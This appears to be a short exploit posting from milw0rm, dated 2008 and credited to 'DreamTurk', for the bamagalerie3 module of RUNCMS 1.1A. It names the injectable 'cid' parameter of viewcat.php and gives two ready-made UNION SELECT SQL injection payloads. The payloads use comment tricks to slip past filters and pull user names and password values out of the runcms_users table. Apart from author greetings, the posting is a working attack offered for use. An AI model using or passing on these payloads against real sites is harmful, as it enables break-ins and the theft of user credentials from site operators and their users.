[~] RUNCMS 1.1A : bamagalerie3 Module Remote SQL Injection's (cid) [~] [~] Script Page : http://runcms.org/ [~] ---------------------------------------------------------- [~] [~] AUTHOR : DreamTurk [~] Exploit coded and founded by DreamTurk :) [~] [~] [~] dream@dr3amturk.org [~] [~] ----------------------------------------------------------- [~] Greetz tO:-Cr@zy_King :) [~] [~] [~] [~]| Cr@zy_King | X-c0d3r | [~] [~]------------------------------------------------------------- [~] Exploit :- [~] [~] modules/bamagalerie3/viewcat.php?id=31&cid=Sql [~] [~] Sql 1 : [~] -99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/* [~] Sql 2 : [~] -99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/* # milw0rm.com [2008-04-01]